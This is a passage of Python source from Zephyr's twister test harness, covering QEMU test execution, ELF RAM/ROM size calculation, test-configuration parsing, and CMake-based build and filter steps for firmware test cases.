self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
self._set_skip_reason(harness.state)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
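    """Compute the RAM/ROM footprint of a built Zephyr image.
    Sections listed in alloc_sections consume RAM only, rw_sections consume
    both RAM and ROM, and ro_sections consume ROM (plus RAM when the image
    is not executing in place).
    """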
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
        # Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
        # grep cannot be used as it returns an error if the symbol is not
        # found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
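        # Each parsed line of `objdump -h` looks roughly like (illustrative):
        #   1 text          00003400  00000000  00000000  00000074  2**2
        # i.e. index, name, size, VMA, LMA, file offset, alignment.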
for line in objdump_output:
words = line.split()
            if not words:  # Skip empty lines
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
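        """Convert a raw YAML value into the Python type named by typestr.
        Supported type strings are "str", "float", "int", "bool", "map", and
        the compound forms "list[:<type>]" / "set[:<type>]", which split a
        string on whitespace and optionally cast each element. For example,
        _cast_value("kernel posix", "set") returns {"kernel", "posix"}.
        """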
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % typestr)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
                    whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
                    # By default, we just concatenate string values of keys
                    # which appear both in "common" and per-test sections,
                    # but some keys are handled in an ad hoc way based on
                    # their semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main)
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
            in the test case configuration file. For many test cases that just
            define one test, this can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
            # do not match until end-of-line, otherwise we won't allow
            # stc_regex below to catch the ones that are declared in the same
            # line--as we only search starting at the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
stc_regex = re.compile(
            br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
            # Consume the argument that becomes the extra testcase
\(\s*(?P<stc_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
registered_suite_regex_match = registered_suite_regex.search(
main_c)
if registered_suite_regex_match:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if not suite_regex_match and not has_registered_test_suites:
                    # can't find ztest_test_suite, maybe a client of ztest
                    # that merely includes ztest.h
return ScanPathResult(
matches=None,
warnings=None,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
suite_run_match = suite_run_regex.search(main_c)
if suite_regex_match and not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
if suite_regex_match:
search_start = suite_regex_match.end()
else:
search_start = registered_suite_regex_match.end()
if suite_run_match:
search_end = suite_run_match.start()
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(main_c, search_start) \
.end()
achtung_matches = re.findall(
achtung_regex,
main_c[search_start:search_end])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[search_start:search_end])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return ScanPathResult(
matches=matches,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
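        """Return True if this instance can actually be run, not just built."""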
        # Right now we only support building on Windows. Running is still
        # work in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
        # Create this in a "twister/" subdirectory, otherwise the overlay
        # would be passed to kconfig.py *twice* and kconfig.cmake would
        # silently give that second pass precedence over any
        # --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
